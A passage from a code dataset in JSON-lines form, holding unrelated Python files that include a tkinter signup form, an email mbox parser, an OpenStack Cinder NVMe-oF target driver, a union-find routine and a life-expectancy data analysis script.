+= 1\n if new == N:\n break\nprint(cycle)\n\n\n\n","sub_path":"백준 문제 풀이/1110.py","file_name":"1110.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"537698838","text":"from tkinter import *\nfrom tkinter import ttk\n\nwindow = Tk()\nframe_app = Frame(window, width=400, height=600, bg=\"red\")\nframe_app.pack()\n\n# Widgets dentro del contender APP\nframe_navbar = Frame(frame_app, width=400, height=100)\nframe_navbar.grid(row=0, column=0)\nframe_title = Frame(frame_app, width=400, height=150)\nframe_title.grid(row=1, column=0)\nframe_options = Frame(frame_app, width=400, height=500)\nframe_options.grid(row=2, column=0)\n\n# Widgets dentro del contender OPTIONS\nframe_food = Frame(frame_options, width=350, height=350, bg=\"#d48df0\")\nframe_food.place(x=25, y=30)\n# frame_drinks = Frame(frame_options, width=350, height=200, bg=\"#eba2a2\")\n# frame_drinks.place(x=25, y=380)\nlabel_food = Label(frame_food, \n text=\"Comida\",\n font=(\"Calibri\", \"22\", \"bold\"),\n fg=\"white\",\n bg=\"#d48df0\")\nlabel_food.place(x=20, y=290)\ndef formulario():\n Label(frame_food, text=\"SE HA ENVIADO TU FORMULARIO\", bg=\"red\").grid(row=4, column=0)\n \nnombre = Entry(frame_food)\nnombre = Label(frame_food, text=\"NOMBRE:\", bg=\"pink\")\nnombre.grid(row=0, column=0)\n\nn = Entry(frame_food, width=50)\nn.grid(row=1,column=0)\n\ncuenta = Entry(frame_food)\ncuenta = Label(frame_food, text=\"CORREO:\",bg=\"pink\")\ncuenta.grid(row=2,column=0)\n\nc = Entry(frame_food, width=50)\nc.grid(row=3,column=0)\n\ngrado = Entry(frame_food)\ngrado = Label(frame_food, text=\"CONTRASEÑA:\", bg=\"pink\")\ngrado.grid(row=4,column=0)\n\ng = Entry(frame_food, width=50)\ng.grid(row=5, column=0)\n\nboton_enviar = Button(frame_food, text=\"ENVIAR\", bg=\"gray\", command=formulario)\nboton_enviar.grid(row=6, column=0)\n\n# Widgets dentro del contender NAVBAR\ntitle = Label(frame_navbar, \n text=\"Menú\",\n font=(\"Calibri\", \"14\"))\ntitle.place(x=320, y=40)\n\n# Widgets dentro del contender TITLE\ntitle1 = Label(frame_title, \n text=\"¡Bienvenido(a)!\", \n font=(\"Calibri\", \"22\", \"bold\"),\n justify=LEFT)\ntitle1.place(x=25, y=10)\ntitle2 = Label(frame_title, \n text=\"¿Quieres ser parte de nuestra \\ncomunidad?\", \n font=(\"Calibri\", \"18\"),\n justify=LEFT)\ntitle2.place(x=25, y=50)\n\nwindow.mainloop()\n","sub_path":"register_form (1).py","file_name":"register_form (1).py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587178154","text":"#!/bin/python\n\n\nfrom ..readOif import readOif\nfrom ..PPreadColoursUser import PPreadColoursUser\n\n\ndef test_PPreadColoursUser():\n \n resval=0.6\n \n padain=readOif('./data/test/oiftestoutput')\n padafr=PPreadColoursUser(padain, 'r-X', 0.6, 0.0)\n \n val=padafr.at[0,'r-X']\n \n assert resval==val","sub_path":"modules/tests/test_PPreadColoursUser.py","file_name":"test_PPreadColoursUser.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"190261758","text":"from random import randint\r\n\r\n\r\ndef get_words():\r\n with open('words.txt', 'r') as dictionary:\r\n words = [i for i in dictionary.readlines()]\r\n for i in words:\r\n i.strip('')\r\n word = words[randint(0, len(words) - 1)]\r\n return word\r\n\r\n\r\nprint(get_words())\r\n","sub_path":"30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427329658","text":"from openerp.osv import fields,osv\nfrom openerp import tools\n\nclass op_parent_admission(osv.osv):\n _name = 'op.parent.admission' #PERFIL COMPORTAMIENTO\n # lo siguiente son las columnas de la tabla\n _columns = {\n 'parent_id': fields.many2one('op.admission','Admision'), #id de admission\n 'parent_type': fields.selection([('Padre','Padre'),('Madre','Madre')], string='Parentesco'),\n\n 'name': fields.char(size=128, string='Nombre'),\n 'marital_status': fields.char(size=128, string='Estado Civil'),\n 'grade': fields.char(size=128, string='Grado maximo de estudios'),\n 'ocupation': fields.char(size=128, string='Ocupacion'),\n 'company': fields.char(size=128, string='Compania'),\n 'company_ubication': fields.char(size=128, string='Ubicacion de la Compania'),\n 'job': fields.char(size=128, string='Puesto que ocupa'),\n 'department': fields.char(size=128, string='Departamento'),\n 'schedule': fields.char(size=128, string='Horario de Trabajo'),\n 'rfc': fields.char(size=15, string='RFC'),\n 'house': fields.selection([('Si','Si'),('No','No')], string='Tiene casa propia?'),\n 'rent': fields.char(size=128, string='Monto de la renta'),\n 'car': fields.selection([('Si','Si'),('No','No')], string='Tiene automovil?'),\n 'brand_car': fields.char(size=128, string='Marca'),\n 'model_car': fields.char(size=128, string='Modelo'),\n 'monthly_income': fields.float( string='Ingreso Mensual'),\n 'email': fields.char(size=128, string='Email'),\n 'student': fields.selection([('Si','Si'),('No','No')], string='Es ex-alumno?'),\n 'generation': fields.char(size=128, string='Generacion'),\n 'mobile': fields.char(size=16, string='Cel'),\n #Direccion\n 'street': fields.char(size=256, string='Calle'),\n 'street2': fields.char(size=256, string='Colonia'),\n 'numero': fields.char(size=256, string='Numero Ext'),\n 'interior': fields.char(size=256, string='Numero Int'),\n 'zip': fields.char(size=8, string='CP'),\n 'state_id': fields.many2one('res.country.state', string='Estado'),\n 'phone': fields.char(size=16, string='Telefono'),\n 'city': fields.many2one('res.country.state.city', string='Ciudad'),\n 'country_id': fields.many2one('res.country', string='Pais'),\n\n 'apoderado_admin':fields.boolean('Apoderado Administrativo'),\n 'apoderado_acad':fields.boolean('Apoderado Academico'),\n 'active':fields.boolean('Activo'),\n 'beca': fields.many2one('product.pricelist', string='Beca'), #CAMBIAR POR PRICE LIST\n 'datos_beca':fields.char('Datos Beca',size=120),\n 'autorizado':fields.char('Autorizo',size=120),\n 'exist_father': fields.many2one('res.partner','Padre'), #que papa es\n 'check_exist_father': fields.boolean('Padre Existente'),\n 'invoice_taxation': fields.many2one('regimen.fiscal', string='Regimen Fiscal'),\n\n }\n _defaults={\n\n\n 'active': True,\n }\nop_parent_admission()\n","sub_path":"openeducat_erp/op_admission/op_parent_admission.py","file_name":"op_parent_admission.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384471316","text":"import os\nimport email\nfrom email.utils import *\nimport mailbox\nimport string\nimport time\nimport re\nfrom dateutil.parser import *\n\ndef addField(name,mail,msg):\n\ttmp = msg.get(name)\n\tif not tmp is None:\n\t\tmail[name] = tmp.strip()#strip whitespace\n\telse :\n\t\tmail[name] = \"Null\"\n\n\n\n\ndef addMultiIdField(name,mail,msg):\n\n\ttmp = msg.get(name)#pull data\n\n\n\tif not tmp is None and tmp != \"\": #see if anyting was pulled\n\n\t\tmail[name] = tmp\n\n\t\ttmp = msg.get_all(name)\n\n\t\tfor value in tmp:\n\n\t\t\tids = re.split(' |,|\\t|\\n|\\r',value)\n\n\t\t\tout = list()\n\n\t\t\tfor x in ids:\n\n\t\t\t\ta = x.split(\"><\")\n\n\t\t\t\tif len(a) > 1:\n\t\t\t\t\tout.append(a[0] + \">\")\n\t\t\t\t\tout.append(\"<\" + a[-1])\n\n\t\t\t\t\tfor y in a[1:][:-1]:\n\t\t\t\t\t\tout.append(\"<\" + y + \">\")\n\n\t\t\t\telse:\n\t\t\t\t\tout.append(x)\n\n\n\n\t\t\tfinal = list()\n\n\t\t\tfor x in out:\n\t\t\t\tif \"@\" in x:\n\t\t\t\t\tfinal.append(x)\n\t\t\t\telif len(x) > 1 and x[0] == \"<\" and x[-1] == \">\":\n\t\t\t\t\tfinal.append(x)\n\n\t\t\t\t\t#print(\"\\n\")\n\t\t\t\t\t#print(mail[name])\n\t\t\t\t\t#print(x)\n\n\n\t\t\tif len(final) > 0:\n\t\t\t\tmail[name + \"-ID\"] = final\n\t\t\telse:\n\t\t\t\tmail[name + \"-ID\"] = [\"Null\"]\n\n\t\t\t\t#print(\"\\n\")\n\t\t\t\t#print(mail[name])\n\t\t\t\t#print(out)\n\t\t\t\t#print(final)\n\n\telse:\t#if nothing was pulled, set to null\n\n\t\tmail[name] = \"Null\"\n\t\tmail[name + \"-ID\"] = [\"Null\"]\n\n\n\n\n\n\n\ndef addAddressField(name,mail,msg):\n\ttmp = msg.get(name)\n\n\tif not tmp is None and tmp != \"\":\n\n\t\tmail[name] = tmp\n\n\t\ttmp = msg.get_all(name, [])\n\t\ttmp = getaddresses(tmp)\n\n\t\ti = 0\n\n\t\ttmp_name = []\n\t\ttmp_address = []\n\n\n\t\twhile i < len(tmp) :\n\n\t\t\tif tmp[i][0] != '' : #check if name was extracted\n\t\t\t\ttmp_name.append(tmp[i][0])\n\n\n\t\t\tif tmp[i][1] != '' : #check if address was extracted\n\t\t\t\ttmp_address.append(tmp[i][1])\n\n\n\t\t\ti = i + 1\n\n\t\tif not tmp_name: #if empty then add null\n\t\t\ttmp_name.append(\"Null\")\n\n\t\tif not tmp_address : #if empty then add null\n\t\t\ttmp_address.append(\"Null\")\n\n\n\t\tmail[name + \"-name\"] = tmp_name\n\t\tmail[name + \"-address\"] = tmp_address\n\n\telse :\n\t\tmail[name] = \"Null\"\n\t\tmail[name + \"-name\"] = [\"Null\"]\n\t\tmail[name + \"-address\"] = [\"Null\"]\n\ndef printmail(inn):\n\tprint(\"\\n\")\n\tfor key, value in inn.items():\n\t\tprint(key, ':', value)\n\n\tprint(\"\\n\\n\\n\")\n\ndef parseDate(a):\n\n\ttry :\n\t\treturn time.strftime(\"%Y-%m-%dT%H:%M:%S\",parsedate(a))\n\texcept :\n\t\treturn \"1900-01-01T0001:00\"\n\n\ndef getTimezone(a):\n\ta = a.split(\" \")\n\treturn a[len(a)-1]\n\ndef parsefile(fileinn,mailing_list) :\n\n\t#print(fileinn)\n\n\n\tbox = mailbox.mbox(fileinn)\n\n\titer = box.iterkeys()\n\n\tout = []\n\n\tfor key in iter :\n\n\t\tmsg = box.get_message(key)\n\n\t\tmail = {}\n\t\t#Aaccording to rfc4021\n\t\t#https://tools.ietf.org/html/rfc4021#section-2.1\n\n\n\t\t#set these so they show up in solr\n\n\t\ttmp = msg.get(\"Date\")\n\t\tif not tmp is None:\n\n\n\t\t\tmail[\"Date\"] = parseDate(tmp)\n\t\t\tmail[\"Date-raw\"] = tmp\n\t\t\tmail[\"Timezone\"] = getTimezone(tmp)\n\n\n\n\t\telse :\n\n\t\t\tmail[\"Date\"] = \"1900-01-01T0001:00\"\n\t\t\tmail[\"Date-raw\"] = \"Null\"\n\t\t\tmail[\"Timezone\"] = -9999\n\n\n\n\t\taddAddressField(\"From\",mail,msg)\n\n\t\taddAddressField(\"Sender\",mail,msg)\n\n\t\taddAddressField(\"Reply-to\",mail,msg)\n\n\t\taddAddressField(\"To\",mail,msg)\n\n\t\taddAddressField(\"Cc\",mail,msg)\n\n\t\taddAddressField(\"Bcc\",mail,msg)\n\n\t\taddField(\"Message-ID\",mail,msg)\n\n\t\taddMultiIdField(\"In-Reply-To\",mail,msg)\n\n\t\taddMultiIdField(\"References\",mail,msg)\n\n\t\taddField(\"Comments\",mail,msg)\n\n\t\taddField(\"Subject\",mail,msg)\n\n\t\t#print(mail[\"Message-ID\"])\n\t\t#print(mail[\"In-Reply-To\"])\n\n\t\tmail[\"Mailing-list\"] = mailing_list\n\t\tmail[\"File-location\"] = fileinn\n\n\n\t\tif not msg.is_multipart() : #This means that we are dealing with a regular text mail, no fancy parsing\n\t\t\t#print(box.get_message(key).get_payload())\n\n\n\t\t\tmail[\"Content\"] = box.get_message(key).get_payload()\n\n\t\t\t#print(mail[\"Content\"])\n\t\t\tout.append(mail)\n\t\t\t#print(\"---------------STR MSG---------------\")\n\n\t\telse : #probably MIME mail parsing\n\n\t\t\tmail[\"Content\"] = \"\"\n\t\t\tfor part in msg.walk():\n\t\t\t\tif part.get_content_type() == \"text/plain\":\n\t\t\t\t\tmail[\"Content\"] += part.get_payload()\n\t\t\t#print(mime_mail[\"Content\"])\n\t\t\tout.append(mail)\n\t\t\t#print(\"---------------MIME MSG---------------\")\n\t\t#=============================================================================\n\n\t\t#printmail(mail)\n\n\t\t#exit(0) #------------------------\n\n\n\t#print(\"Date = \" + out[0][\"Date\"])\n\t#print(\"From = \" + out[0][\"From\"])\n\t#print(\"Sender = \" + out[0][\"Sender\"])\n\t#print(\"Reply-to = \" + out[0][\"Reply-to\"])\n\t#print(\"Subject = \" + out[0][\"Subject\"])\n\t#print(\"Maling-list = \" + out[0][\"Mailing-list\"])\n\t#print(\"File-location = \" + out[0][\"File-location\"])\n\n\treturn out;\n","sub_path":"Raw repo/code/parser/mailparser.py","file_name":"mailparser.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"197643904","text":"# coding=utf-8\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport wrapt\n\nfrom scout_apm.core.tracked_request import TrackedRequest\n\n\n@wrapt.decorator\nasync def wrapped_render_async(wrapped, instance, args, kwargs):\n tracked_request = TrackedRequest.instance()\n span = tracked_request.start_span(operation=\"Template/Render\")\n span.tag(\"name\", instance.name)\n try:\n return await wrapped(*args, **kwargs)\n finally:\n tracked_request.stop_span()\n","sub_path":"src/scout_apm/async_/instruments/jinja2.py","file_name":"jinja2.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"466125313","text":"def _gorner(coeffs: list, point)->list:\n# inverted_coeffs = coeffs * (-1) if coeffs[0] < 0\n gorner_coeffs = [0] * len(coeffs)\n for i in range(0, len(gorner_coeffs)):\n gorner_coeffs[i] = gorner_coeffs[i-1]*point+coeffs[i]\n return gorner_coeffs\n\ndef upper_border(coeffs):\n start_point = delta = 1\n while True:\n result = _gorner(coeffs, start_point)\n if result[0] >= 0 and all(map(lambda x: x > 0, result)):\n return start_point\n start_point += delta\n\n\ndef lower_border(coeffs):\n transformed_coeffs = [((-1)**i)*coeff for i, coeff in enumerate(coeffs)]\n start_point = delta = 1\n while True:\n result = _gorner(transformed_coeffs, start_point)\n if result[0] >= 0 and all(map(lambda x: x > 0, result)):\n return -start_point\n start_point += delta\n","sub_path":"l1/gorner.py","file_name":"gorner.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"385486322","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport abc\n\nfrom oslo_log import log as logging\n\nfrom cinder import exception\nfrom cinder.i18n import _\nfrom cinder.volume.targets import driver\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass UnsupportedNVMETProtocol(exception.Invalid):\n message = _(\"An invalid 'target_protocol' \"\n \"value was provided: %(protocol)s\")\n\n\nclass NVMeOF(driver.Target):\n\n \"\"\"Target object for block storage devices with RDMA transport.\"\"\"\n\n protocol = 'nvmeof'\n target_protocol_map = {\n 'nvmet_rdma': 'rdma',\n }\n\n def __init__(self, *args, **kwargs):\n \"\"\"Reads NVMeOF configurations.\"\"\"\n\n super(NVMeOF, self).__init__(*args, **kwargs)\n self.target_ip = self.configuration.target_ip_address\n self.target_port = self.configuration.target_port\n self.nvmet_port_id = self.configuration.nvmet_port_id\n self.nvmet_ns_id = self.configuration.nvmet_ns_id\n self.nvmet_subsystem_name = self.configuration.target_prefix\n target_protocol = self.configuration.target_protocol\n if target_protocol in self.target_protocol_map:\n self.nvme_transport_type = self.target_protocol_map[\n target_protocol]\n else:\n raise UnsupportedNVMETProtocol(\n protocol=target_protocol\n )\n\n def initialize_connection(self, volume, connector):\n \"\"\"Returns the connection info.\n\n In NVMeOF driver, :driver_volume_type: is set to 'nvmeof',\n :data: is the driver data that has the value of\n _get_connection_properties.\n\n Example return value:\n\n .. code-block:: json\n\n {\n \"driver_volume_type\": \"nvmeof\",\n \"data\":\n {\n \"target_portal\": \"1.1.1.1\",\n \"target_port\": 4420,\n \"nqn\": \"nqn.volume-0001\",\n \"transport_type\": \"rdma\",\n \"ns_id\": 10\n }\n }\n \"\"\"\n return {\n 'driver_volume_type': self.protocol,\n 'data': self._get_connection_properties(volume)\n }\n\n def _get_connection_properties(self, volume):\n \"\"\"Gets NVMeOF connection configuration.\n\n :return: dictionary of the following keys:\n :target_portal: NVMe target IP address\n :target_port: NVMe target port\n :nqn: NQN of the NVMe target\n :transport_type: Network fabric being used for an\n NVMe-over-Fabrics network\n :ns_id: namespace id associated with the subsystem\n \"\"\"\n\n location = volume['provider_location']\n target_connection, nvme_transport_type, nqn, nvmet_ns_id = (\n location.split(' '))\n target_portal, target_port = target_connection.split(':')\n\n return {\n 'target_portal': target_portal,\n 'target_port': target_port,\n 'nqn': nqn,\n 'transport_type': nvme_transport_type,\n 'ns_id': nvmet_ns_id\n }\n\n def get_nvmeof_location(self, nqn, target_ip, target_port,\n nvme_transport_type, nvmet_ns_id):\n \"\"\"Serializes driver data into single line string.\"\"\"\n\n return \"%(ip)s:%(port)s %(transport)s %(nqn)s %(ns_id)s\" % (\n {'ip': target_ip,\n 'port': target_port,\n 'transport': nvme_transport_type,\n 'nqn': nqn,\n 'ns_id': nvmet_ns_id})\n\n def terminate_connection(self, volume, connector, **kwargs):\n pass\n\n def create_export(self, context, volume, volume_path):\n \"\"\"Creates export data for a logical volume.\"\"\"\n\n return self.create_nvmeof_target(\n volume['id'],\n self.configuration.target_prefix,\n self.target_ip,\n self.target_port,\n self.nvme_transport_type,\n self.nvmet_port_id,\n self.nvmet_ns_id,\n volume_path)\n\n def ensure_export(self, context, volume, volume_path):\n pass\n\n def remove_export(self, context, volume):\n return self.delete_nvmeof_target(volume)\n\n def validate_connector(self, connector):\n if 'initiator' not in connector:\n LOG.error('The volume driver requires the NVMe initiator '\n 'name in the connector.')\n raise exception.InvalidConnectorException(\n missing='initiator')\n return True\n\n @abc.abstractmethod\n def create_nvmeof_target(self,\n volume_id,\n subsystem_name,\n target_ip,\n target_port,\n transport_type,\n nvmet_port_id,\n ns_id,\n volume_path):\n pass\n\n @abc.abstractmethod\n def delete_nvmeof_target(self, target_name):\n pass\n","sub_path":"cinder/volume/targets/nvmeof.py","file_name":"nvmeof.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"643206825","text":"from numba import njit\n\n\n@njit('i8(i8,i8[:])', cache=True)\ndef find_root(x, root):\n while root[x] != x:\n root[x] = root[root[x]]\n x = root[x]\n return x\n\n\n@njit('b1(i8,i8,i8[:],i8[:])', cache=True)\ndef merge(x, y, root, size):\n x = find_root(x, root)\n y = find_root(y, root)\n if x == y:\n return False\n if size[x] < size[y]:\n root[x] = y\n size[y] += size[x]\n else:\n root[y] = x\n size[x] += size[y]\n return True\n","sub_path":"graph/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546617605","text":"import math\n\nimport math\n\ndef get_fall_time(height):\n # gravity isn't going to change, units in m/(s^2)\n acceleration_by_gravity = 9.8\n time_elapsed = math.sqrt((2 * height) / acceleration_by_gravity)\n return time_elapsed\n\nget_fall_time(15)\n\n\ndef isVulnerable(tower_height, tower_x, tower_y, target_x, target_y):\n muzzle_velocity = 300\n\n # update this line to calculate time_in_air using get_fall_time() function\n time_in_air = get_fall_time(tower_height)\n\n tower_range = time_in_air*muzzle_velocity\n \n delta_x = tower_x - target_x\n \n delta_y = tower_y - target_y\n \n\n separation = delta_x**2+delta_y**2\n\n if separation < tower_range:\n print(\"The target is closer than the tower range, what should we return?\")\n return None\n else:\n print(\"The target is further than the tower range, what should we return?\")\n return None\n\nisVulnerable(15, 20, 30, 40, 50)\n\n","sub_path":"intro-programming/assignment_5/controlled_fall.py","file_name":"controlled_fall.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371734481","text":"from django.db.models.fields.related_descriptors import (\n ForwardManyToOneDescriptor as Descriptor,\n)\n\nfrom . import settings\n\n\ndef get_queryset_patch(func):\n def wrapper(self, **hints):\n from .models import PermanentModel\n\n instance = hints.get(\"instance\")\n if (\n instance\n and isinstance(instance, PermanentModel)\n and getattr(instance, settings.FIELD)\n ):\n model = self.field.remote_field.model\n if hasattr(model, \"all_objects\"):\n return model.all_objects\n return model.objects\n return func(self, **hints)\n\n return wrapper\n\n\nDescriptor.get_queryset = get_queryset_patch(Descriptor.get_queryset)\n","sub_path":"django_permanent/related.py","file_name":"related.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"94473195","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats.mstats import winsorize\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error\nimport pickle\n\n\n# In[2]:\n\n\ndf = pd.read_csv(\"C:/Users/Dell/Desktop/Life Expectancy/Deployment-flask-master/Life Expectancy Data.csv\")\ndf.head(20)\n\n\n# In[3]:\n\n\ndf.isnull().sum()\n\n\n# In[4]:\n\n\ndf.shape\n\n\n# In[5]:\n\n\ndf.dtypes\n\n\n# In[6]:\n\n\ndf.describe()\n\n\n# In[7]:\n\n\ndf.info()\n\n\n# In[8]:\n\n\ncountry_list = df.Country.unique()\nfill_list = ['Country', 'Year', 'Status', 'Life expectancy ', 'Adult Mortality','infant deaths', 'Alcohol', 'percentage expenditure', 'Hepatitis B','Measles ', ' BMI ', 'under-five deaths ', 'Polio', 'Total expenditure','Diphtheria ', ' HIV/AIDS', 'GDP', 'Population',\n ' thinness 1-19 years', ' thinness 5-9 years',\n 'Income composition of resources', 'Schooling']\n\n\n# In[9]:\n\n\nfor country in country_list:\n df.loc[df['Country'] == country,fill_list] = df.loc[df['Country'] == country,fill_list].interpolate()\ndf.dropna(inplace=True)\n\n\n# In[10]:\n\n\ndf.shape\n\n\n# In[11]:\n\n\ndf.isnull().sum()\n\n\n# In[12]:\n\n\ndf.rename(columns={\" BMI \":\"BMI\",\"Life expectancy \":\"Life_Expectancy\",\"Adult Mortality\":\"Adult_Mortality\",\n \"infant deaths\":\"Infant_Deaths\",\"percentage expenditure\":\"Percentage_Exp\",\"Hepatitis B\":\"HepatitisB\",\n \"Measles \":\"Measles\",\" BMI \":\"BMI\",\"under-five deaths \":\"Under_Five_Deaths\",\"Diphtheria \":\"Diphtheria\",\n \" HIV/AIDS\":\"HIV/AIDS\",\" thinness 1-19 years\":\"thinness_1to19_years\",\" thinness 5-9 years\":\"thinness_5to9_years\",\"Income composition of resources\":\"Income_Comp_Of_Resources\",\n \"Total expenditure\":\"Tot_Exp\"},inplace=True)\n\n\ncol_dict = {'Life_Expectancy':1 , 'Adult_Mortality':2 ,\n 'Alcohol':3 , 'Percentage_Exp': 4, 'HepatitisB': 5,\n 'Measles' : 6, 'BMI': 7, 'Under_Five_Deaths' : 8, 'Polio' : 9, 'Tot_Exp' :10,\n 'Diphtheria':11, 'HIV/AIDS':12, 'GDP':13, 'Population' :14,\n 'thinness_1to19_years' :15, 'thinness_5to9_years' :16,\n 'Income_Comp_Of_Resources' : 17, 'Schooling' :18, 'Infant_Deaths':19}\n\n\n# In[13]:\n\n\nfor variable in col_dict.keys():\n q75, q25 = np.percentile(df[variable], [75 ,25])\n iqr = q75 - q25\n min_val = q25 - (iqr*1.5)\n max_val = q75 + (iqr*1.5)\n print(\"Number of outliers in {} : {} \".format(variable,len((np.where((df[variable] > max_val) | (df[variable] < min_val))[0]))))\n\n\n# In[14]:\n\n\nplt.figure(figsize=(20,30))\n\nfor variable,i in col_dict.items():\n plt.subplot(5,4,i)\n plt.boxplot(df[variable],whis=1.5)\n plt.title(variable)\n\nplt.show()\n\n\n# In[15]:\n\n\nplt.figure(figsize=(20,30))\n\nfor variable,i in col_dict.items():\n plt.subplot(5,4,i)\n plt.scatter(df[\"Life_Expectancy\"], df[variable])\n plt.title(variable)\n\nplt.show()\n\n\n# In[16]:\n\n\nwinsorize(df[\"Life_Expectancy\"],(0.01,0), inplace=True)\nwinsorize(df[\"Adult_Mortality\"],(0,0.03), inplace=True)\nwinsorize(df[\"Infant_Deaths\"],(0,0.10), inplace=True)\nwinsorize(df[\"Alcohol\"],(0,0.01), inplace=True)\nwinsorize(df[\"Percentage_Exp\"],(0,0.12), inplace=True)\nwinsorize(df[\"HepatitisB\"],(0.11,0), inplace=True)\nwinsorize(df[\"Measles\"],(0,0.19), inplace=True)\nwinsorize(df[\"Under_Five_Deaths\"],(0,0.12), inplace=True)\nwinsorize(df[\"Polio\"],(0.09,0), inplace=True)\nwinsorize(df[\"Tot_Exp\"],(0,0.01), inplace=True)\nwinsorize(df[\"Diphtheria\"],(0.10,0), inplace=True)\nwinsorize(df[\"HIV/AIDS\"],(0,0.16), inplace=True)\nwinsorize(df[\"GDP\"],(0,0.13), inplace=True)\nwinsorize(df[\"Population\"],(0,0.14), inplace=True)\nwinsorize(df[\"thinness_1to19_years\"],(0,0.04), inplace=True)\nwinsorize(df[\"thinness_5to9_years\"],(0,0.04), inplace=True)\nwinsorize(df[\"Income_Comp_Of_Resources\"],(0.05,0), inplace=True)\nwinsorize(df[\"Schooling\"],(0.02,0.01), inplace=True)\n\n\n# In[17]:\n\n\nfor variable in col_dict.keys():\n q75, q25 = np.percentile(df[variable], [75 ,25])\n iqr = q75 - q25\n min_val = q25 - (iqr*1.5)\n max_val = q75 + (iqr*1.5)\n print(\"Number of outliers in {} : {} \".format(variable,len((np.where((df[variable] > max_val) | (df[variable] < min_val))[0]))))\n\n\n# In[18]:\n\n\nplt.figure(figsize=(20,30))\n\nfor variable,i in col_dict.items():\n plt.subplot(5,4,i)\n plt.scatter(df[\"Life_Expectancy\"], df[variable])\n plt.title(variable)\n\nplt.show()\n\n\n# In[19]:\ndata=df.drop(columns=['Country','Status'])\ndata.head()\n\n#Using Pearson Correlation\nplt.figure(figsize=(12,10))\ncor = data.corr()\nsns.heatmap(cor, annot=True, cmap=plt.cm.Reds)\nplt.show()\n\n#Correlation with output variable\ncor_target = abs(cor[\"Life_Expectancy\"])\n#Selecting highly correlated features\nrelevant_features = cor_target[cor_target>0.5]\nrelevant_features.sort_values(ascending=False)\n\n#Adult Mortality - Adult Mortality Rates of both sexes (probability of dying between 15 and 60 years per 1000 population)\n\n#HIV/AIDS - Deaths per 1 000 live births HIV/AIDS (0-4 years)\n\n#Income_Comp_Of_Resources - Human Development Index in terms of income composition of resources (index ranging from 0 to 1)\n\n#Schooling - Number of years of Schooling(years)\n\n#BMI - Average Body Mass Index of entire population\n\n#Percentage_Exp - Expenditure on health as a percentage of Gross Domestic Product per capita(%)\n\n#GDP - Gross Domestic Product per capita (in USD)\n\n\n\n\n# In[20]:\n\n\nplt.figure(figsize=(20,8))\n\nplt.subplot(1,3,1)\nplt.scatter(df[\"Schooling\"], df[\"Income_Comp_Of_Resources\"])\nplt.title(\"Schooling vs Income_Comp_Of_Resources \")\n\nplt.subplot(1,3,2)\nplt.scatter(df[\"BMI\"], df[\"Income_Comp_Of_Resources\"])\nplt.title(\"BMI vs Income_Comp_Of_Resources\")\n\nplt.subplot(1,3,3)\nplt.scatter(df[\"GDP\"], df[\"Percentage_Exp\"])\nplt.title(\"GDP vs Percentage_Exp\")\n\nplt.show()\n\n\n# In[21]:\n\n\nplt.figure(figsize=(20,8))\nplt.subplot(1,3,1)\nplt.scatter(df[\"HIV/AIDS\"], df[\"Adult_Mortality\"])\nplt.title(\" HIV/AIDS vs AdultMortality\")\n\nplt.subplot(1,3,2)\nplt.scatter(df[\"Schooling\"], df[\"GDP\"])\nplt.title(\"Schooling vs GDP\")\n\nplt.subplot(1,3,3)\nplt.scatter(df[\"BMI\"], df[\"Schooling\"])\nplt.title(\"BMI vs Schooling\")\nplt.show()\n\n# In[22]:\n\n\nround(df[['Status','Life_Expectancy']].groupby(['Status']).mean(),2)\n\n\n# In[23]:\n\n\nimport scipy.stats as stats\nstats.ttest_ind(df.loc[df['Status']=='Developed','Life_Expectancy'],df.loc[df['Status']=='Developing','Life_Expectancy'])\n\n\n# In[24]:\n\n\nrepl={\"Status\":{\"Developing\":0,\"Developed\":1}}\ndf.replace(repl, inplace=True)\ndf = df.apply(pd.to_numeric, errors='coerce')\n\ncols=['Country', 'Year', 'Life_Expectancy',\n 'Infant_Deaths', 'Percentage_Exp', 'HepatitisB', 'Measles',\n 'BMI', 'Under_Five_Deaths', 'Polio', 'Tot_Exp', 'Diphtheria',\n 'GDP', 'Population', 'thinness_1to19_years',\n 'thinness_5to9_years']\n \n\n# In[25]:\n\nX = 